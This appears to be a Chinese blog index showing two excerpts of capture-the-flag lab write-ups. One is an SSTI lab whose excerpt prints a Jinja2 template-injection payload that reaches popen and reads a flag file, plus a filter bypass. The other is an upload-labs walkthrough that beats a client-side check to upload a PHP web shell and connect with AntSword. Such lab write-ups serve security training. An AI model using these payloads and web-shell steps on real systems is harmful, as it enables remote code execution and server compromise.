摘要:
sstilab level 1 无过滤 {{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}} level 2 过滤{} 用{%%}代替 print标 阅读全文
摘要:
Pass-01 前端js验证 谷歌设置->隐私安全->网站设置->JavaScript 修改为不允许使用JavaScript 上传php文件 复制图片地址 蚁剑连接 文件上传成功 Pass-02 MIME是一种类型(例如:text,image),MIME是一种标准,是用来表示文档,文件或字节流的性质 阅读全文